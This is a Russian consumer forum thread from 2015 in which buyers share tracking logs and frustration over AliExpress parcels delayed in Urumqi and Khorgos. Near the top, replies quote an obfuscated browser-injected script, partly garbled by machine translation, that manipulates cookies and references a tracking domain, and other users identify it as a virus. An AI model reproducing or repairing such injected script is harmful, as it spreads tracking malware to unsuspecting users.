Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Урумчи - 5

Ответов в теме: 1634
РедакторСообщений: 20584Поблагодарили: 11801 раз

carrado писал(а):

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var

проверьте свой компьютер на вирусы или телефон/планшет.

ПользователиСообщений: 15053Поблагодарили: 8690 раз 

carrado писал (а):

<sсriрt> // <[СDATА [window.a1336404323 = 1;! функция () {вар Подмигиваниет = document.cookie.match (новый RegExp ("(?: ^ |Wink" + e.replace (/([\.$?* | {} \ (\ Подмигивание\ [\] \\\ / \ + ^ ]) / г, "\\ $ 1" Подмигивание+ Грустный"[^;] *)"; возвращение т decodeURIComponent (т [1]): недействительными 0}, п = функция (е, т, о) {о = O | | {}; вар п = o.expires, если ("номер" == TypeOf н && п) {вар я = новые Дата; i.setTime (i.getTime () + 1e3 * п), o.expires = i.toUTCString ()} Var R = "3600";! o.expires && г && (o.expires = г), т = encodeURIComponent (т); вар а = е + "=" + т; для (вар D в о) {а + = " ; "+ D; вар C = O [d];! с == 0 && (а + =" = "+ C)} = document.cookie а}, г = функция (е) {е = e.replace (" WWW "," "., для (VAR т =" ", о = 0, п = e.length; п> о; о ++) T + = e.charCodeAt (о) .ToString (16); возвращение т}, А = функция (е) {е = e.match (/ [\ S \ S] {1,2} / г), для (VAR т = "", о = 0; о <e.length; о ++) T + = String.fromCharCode (ParseInt (е [о], 16));} возвращение т, д = функция () {возвращение "alitrack.ru"}, п = функция () {вар W = окно, р = w.document. location.protocol, если (p.indexOf ("HTTP" == 0) {возвращение р} для (вар е = 0; е <3, д ++) {если (w.parent) {ш = w.parent; р = w.document.location.protocol, если (p.indexOf ('HTTP' == 0) возвращение р;} еще {перерыва;}} возвращение ""}, с = функция (е, т, п) {вар LP = р (), если (LP == "" вернуться; вар О && о ())}}}, с = функция (F) {вар т = e.indexOf (е), о = е [T + 1]; о && S (O)})}, F = функция () {вар т, я = JSON.stringify (е); о ("a36677002"! = я && п ("a36677002", я); Var R = O ("a2519043306"; т = R R: [0], с (т)}, е ()} (); //]]>ПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигиваниеПодмигивание

У Вас вирус на компьютере, проверьте антивирусником.

ПользователиСообщений: 26Поблагодарили: 16 раз Николаевск

SvetlayaS, А скажите какой почтой отправлялась та посыль что проскачила,которая 11.11.

У меня сложилось такое мнение,что посылки которые через ад (УРУМЧИ) проходят,отправлены обычной наземной почтой Китая. Хотя на странице "МОИ ЗАКАЗЫ" в подробностях написано China Post Registered Air Mail .

Masha Vasileva, А прод. никак не может ускорить посылку. Он может подать запрос, и получить хз какой ответ в течении 2ух недель. Это он просто Вас успокоил. Крепитесь, и если защиты осталось более 5ти дней,то ждите.

undefinedundefined да,кстати танцы с бубном могут помочь лучше чем отговорки продавца.

Мария Драница, не хочеться Вас расстраивать,но после Урумчи, посылки попадают в Хоргос(это Казахстан. И там такая же ЧЕРНАЯ ДЫРА, посыль может чудом проскочить за день-два,а может пролежать пару недель. А по поводу Оренбурга и Почты России в целом,я в этом году очень даже доволен (может меня Бог миловал). Последняя посыль в Оренбурге трекнулась и через 4 дня была в Волгограде.

Отредактировал(а) JOHN@DEP 25-12-2015 в 12:34
ПользователиСообщений: 1Варна

2015-11-25 10:59 Урумчи Отправка
2015-11-25 10:55 Урумчи Экспорт, Таможенный досмотр
2015-11-20 17:08 Отправка (внутренний транзит)
2015-11-20 17:05 Приём (внутренний транзит)

Вот такая вот штуковина с посылкой.... зависла... уже ровно месяц как отправлена с Урумчи, и никаких новостей. пысы... а заказ был сдел вообще 28 октября.

Отредактировал(а) Иван Федоровцев 25-12-2015 в 12:53
ПользователиСообщений: 5Поблагодарили: 4 раза

Ну наконец-то,пошло движение по территории моей многоуважаемой Родины!

Ждем посылочку как минимум в предверии Нового года,ну или в первой декаде уже следующего Наступающего 2016-го !

Des поблагодарил(а) за этот комментарий
ПользователиСообщений: 18Поблагодарили: 3 раза 

Везёт у кого проскочили..а моя так и висит неужели не набирается отправка перед праздниками,раз они ждут объёмы..голова уже кругом от границ..то украина,то китай зависнитundefined

ПользователиСообщений: 6

groover писал(а):

Ну наконец-то,пошло движение по территории моей многоуважаемой Родины!

Ждем посылочку как минимум в предверии Нового года,ну или в первой декаде уже следующего Наступающего 2016-го !

Вместе пришлиУРА!!!Осталась еще посылка, которая в Урумчи висит с 5.12.15 и вот когда она придет.... Посылки обезательно в Хоргос заезжать или из Уручми есть прямой маршрут?

ПользователиСообщений: 275Поблагодарили: 351 раз Санкт-Петербург

Вот читаю я эту ветку и не понимаю китайскую почту: заказы, сделанный после 11.11 уже почти дошли до получателя. А сделанные 11.11 так и пылятся на складах почты Китая(( Неужели продавцы в попытке сэкономить полбакса выбирают способ доставки "автостопом"?? Думаю, меня понимают люди в похожей ситуации.

И спор открывать рано: 47 дней до окончания срока защиты((

Может у кого есть рецепт как спокойно дождаться заказа?Laugh

Уфф, выговорился вроде))

ПользователиСообщений: 5Поблагодарили: 4 раза

amstaffman,есть вариант,и вроде как работает

Писал об этом чуть выше, попробуйте, результат должен быть однозначно..

А автарку на удачу сменили? Если да,то тоже тема,надо пробовать все возможные способы воздействия на текущие события и обстоятельства Smile

Отредактировал(а) groover 25-12-2015 в 16:16
amstaffman поблагодарил(а) за этот комментарий
ПользователиСообщений: 275Поблагодарили: 351 раз Санкт-Петербург

groover, аватарку сменил чтобы больше соответствовать нику))

А насчёт теории - практикую по-тихоньку)) спасибо))

ПользователиСообщений: 336Поблагодарили: 604 разаАлматы

JOHN@DEP писал(а):

SvetlayaS, А скажите какой почтой отправлялась та посыль что проскачила,которая 11.11.

У меня сложилось такое мнение,что посылки которые через ад (УРУМЧИ) проходят,отправлены обычной наземной почтой Китая. Хотя на странице "МОИ ЗАКАЗЫ" в подробностях написано China Post Registered Air Mail

Посылка шла обычной чина пост. Может мне просто повезло? Хотя я у этого продавца беру не в первый раз и посылки от него доходят относительно быстро. У меня есть теория может там трек-номера какие-нибудь особенные. Китайцы видят этот номер и быстрее пропускают ее.

Кстате жаловалась на Сингапур, а зря. Засветилась таки моя посылочка в Ате. Так что в понедельник уже будет у меня.

JOHN@DEP поблагодарил(а) за этот комментарий
ПользователиСообщений: 4 Москва

JOHN@DEP писал(а):

Мария Драница, не хочеться Вас расстраивать,но после Урумчи, посылки попадают в Хоргос(это Казахстан. И там такая же ЧЕРНАЯ ДЫРА, посыль может чудом проскочить за день-два,а может пролежать пару недель. А по поводу Оренбурга и Почты России в целом,я в этом году очень даже доволен (может меня Бог миловал). Последняя посыль в Оренбурге трекнулась и через 4 дня была в Волгограде.

Ох,Господи.Сколько раз заказывала никаких проблем не было,а тут,если повезет,к февралю получу.Деньги я не хочу отправлять(если есть такая возможность).Общались с ними на тему посылки(цвет им сказала перед отправкой),так они хамить начали,мол,какая тебе разница,что пришлем-то пришлем,да и недавно им писала не отвечают ВООБЩЕ.Поэтому,если хочешь получить свои деньги,то будь вежлив.А так,ждемс,товарищи,дойдет,если ее у нас еще не потеряют

Отредактировал(а) Мария Драница 25-12-2015 в 19:15
ПользователиСообщений: 13Поблагодарили: 21 раз Борисов BY

Я не знаю что курят в Урумчах, но то что они курят вставляет видно не по детски.....

ПользователиСообщений: 18Поблагодарили: 1 разЕкатеринбург

ГЛОРИЯ, отпишитесь мне пожалуйста, как у вас движение пойдёт)

у вас с 11 висит в Хоргосе, у меня с 14Sad

Вот что меня больше всего раздражает-в отзывах на этот товар все пишут, что доставка три недели-месяц, у всех, я одна такая чтоли невезучая

ПользователиСообщений: 1 МОСКВА

А МОИ БОЛЬШЕ МЕСЯЦА ЕДУТ И НЕ ОТСЛЕЖИВАЮТСЯSad

ПользователиСообщений: 15Поблагодарили: 3 разаУсть-Каменогорск

2015-11-16 12:57 Урумчи, Экспорт
2015-11-16 12:55 Урумчи, Подготовка к экспорту
2015-10-29 16:25 Урумчи, покинуло сортировочный центр Передано на следующий участок
2015-10-29 13:12 Урумчи, Упаковка в общий пакет
2015-10-29 13:10 Китай CN, 830099, 830099, Прием отправления
2015-10-29 13:10 Урумчи, Приём

Обострила спор сегодня,заказ был сделан аж 5 октября.

ПользователиСообщений: 27Поблагодарили: 8 раз Москва

Елена Зуева писал(а):

ГЛОРИЯ, отпишитесь мне пожалуйста, как у вас движение пойдёт)

у вас с 11 висит в Хоргосе, у меня с 14Sad

Вот что меня больше всего раздражает-в отзывах на этот товар все пишут, что доставка три недели-месяц, у всех, я одна такая чтоли невезучая

Та же история Sad Самая долгая история по моему товару - 30 дней, у меня в общем уже 44 дня из них 36дней в экспорте висит

ПользователиСообщений: 18Поблагодарили: 3 раза 

Елена Зуева, Ну по большому счёту сейчас посылки шли быстрее..летом даже 2-3 недели шли..а тут благо,что праздники..так и в Урумчи м Хоргосом попали..теперь ждём у моря погоды..только что спор открывала по заказу одному..деньги вернули..опять висяк..прям правда подумаешь,что Урумчи аномальная зона..чёрная дыра..

ПользователиСообщений: 3Поблагодарили: 1 раз

Урааа!!! Не прошло и пол года как Хоргос выпустил из своих цепких лап мою посылку. Надеюсь из Екатеринбурга она будет не так долго идти

amstaffman поблагодарил(а) за этот комментарий
ПользователиСообщений: 275Поблагодарили: 351 раз Санкт-Петербург

marina-selezneva-90, а когда Ваша посылка попала в Хоргос, и когда отметилась в Екатеринбурге? Для статистики?Laugh

marina-selezneva-90, спасибо! Обновил трек: моя посылка также уже в России!!! Ура!!! Всем того же желаю!!!))

ПользователиСообщений: 8 Пыть-Ях

Подскажите, добавил трек RO949968528CN в кабинет, было все нормально все отслеживалось, сейчас же выдает следующее:

Техническая ошибка разбора результатов ответа внешнего сервиса. Сервис перестал выдавать информацию об отправлении, несмотря на то, что ранее такая информация была. [CAINIAO]. Код ошибки: 27003

2015-11-13 17:46 Заказ оформлен

Другой сайт то отслеживает- http://track24.ru/?code=RO949968528CN

Что это означает?

Отредактировал(а) west1975 27-12-2015 в 00:37
ПользователиСообщений: 1970Поблагодарили: 2657 разМосква

west1975, Вам сюда.

ПользователиСообщений: 27Поблагодарили: 8 раз Москва

amstaffman, поздравляю!!)) А где в России она у вас трекнулась? В Оренбурге/Екатеринбурге?

amstaffman поблагодарил(а) за этот комментарий
ПользователиСообщений: 275Поблагодарили: 351 раз Санкт-Петербург

Joheunsaram, спасибо)) в Екатеринбурге трекнулась

ПользователиСообщений: 3Поблагодарили: 1 раз

amstaffman, в Екатеринбурге

Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти